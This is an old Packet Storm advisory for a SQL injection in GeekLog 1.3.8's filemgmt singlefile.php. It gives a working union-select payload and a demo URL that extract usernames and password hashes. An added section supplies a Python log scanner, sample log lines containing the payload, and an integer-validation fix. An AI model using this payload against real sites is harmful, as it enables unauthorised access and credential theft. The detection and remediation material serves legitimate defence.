GeekLog 1.3.8 SQL Injection

2010-09-24T00:00:00
ID PACKETSTORM:94194
Type packetstorm
Reporter Gamoscu
Modified 2010-09-24T00:00:00

Description

                                        
`GeekLog v1.3.8 (filemgmt) SQL Injection Vulnerability  
  
###########################  
  
Author : Gamoscu  
  
Homepage : http://www.1923turk.com  
  
Blog : http://gamoscu.wordpress.com/  
  
Script : http://www.geeklog.net/filemgmt/viewcat.php?cid=8  
  
Download : http://www.geeklog.net/filemgmt/viewcat.php?cid=8  
  
###########################  
  
[ Vulnerable File ]  
  
filemgmt/singlefile.php?lid=1 [ SQL ]  
  
[ XpL ]  
  
-1+union+all+select+1,2,concat_ws(username,0x3a,passwd),4,5,6,7,8,9,10,11,12,13,14,15,16+from+gl_users+limit+1,1--  
  
[ Demo ]  
  
http://server/filemgmt/singlefile.php?lid=-1+union+all+select+1,2,concat_ws(username,0x3a,passwd),4,5,6,7,8,9,10,11,12,13,14,15,16+from+gl_users+limit+1,1--  
  
  
`
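
Detection note (an added example, not part of the original advisory or of GeekLog's code): the advisory shows `lid` carrying a numeric file id in normal use, so any request to filemgmt/singlefile.php whose decoded `lid` is not a plain positive integer is worth reviewing. The sketch below applies that allowlist check to web-server access logs; the log lines are constructed, and both the combined log format and the assumption that legitimate `lid` values are always unsigned integers are mine.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [24/Sep/2010:10:00:01 +0000] "GET /filemgmt/singlefile.php?lid=1 HTTP/1.1" 200 5120
192.0.2.44 - - [24/Sep/2010:10:02:17 +0000] "GET /filemgmt/singlefile.php?lid=-1+union+all+select+1,2,concat_ws(username,0x3a,passwd),4+from+gl_users+limit+1,1-- HTTP/1.1" 200 4870
192.0.2.44 - - [24/Sep/2010:10:02:30 +0000] "GET /filemgmt/singlefile.php?lid=%2D1%20UNION%20SELECT%201 HTTP/1.1" 200 4801
192.0.2.10 - - [24/Sep/2010:10:03:00 +0000] "GET /filemgmt/viewcat.php?cid=8 HTTP/1.1" 200 7001
198.51.100.7 - - [24/Sep/2010:10:04:00 +0000] "GET /filemgmt/singlefile.php?lid=12&lid=abc HTTP/1.1" 200 900
"""

REQUEST = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
NUMERIC_ID = re.compile(r"\d{1,10}")  # assumption: valid ids are unsigned integers
SQL_HINT = re.compile(r"\b(union|select|concat(_ws)?|from)\b", re.IGNORECASE)


def suspicious_requests(log_text):
    """Return one finding per singlefile.php request with a non-numeric lid."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if not url.path.lower().endswith("/filemgmt/singlefile.php"):
            continue
        # parse_qs decodes '+' and %XX, so encoded payloads are normalised, and
        # it keeps repeated parameters, so a trailing second lid is not missed.
        values = parse_qs(url.query, keep_blank_values=True).get("lid", [])
        bad = [v for v in values if not NUMERIC_ID.fullmatch(v)]
        if bad:
            findings.append({
                "ip": m["ip"],
                "lid": bad[0],
                "sql_keywords": bool(SQL_HINT.search(bad[0])),
            })
    return findings


if __name__ == "__main__":
    for finding in suspicious_requests(SAMPLE_LOG):
        print(finding)
```

The same integer-only rule is the server-side fix: casting or validating `lid` as an integer before it reaches the query removes the injection point regardless of what a request carries.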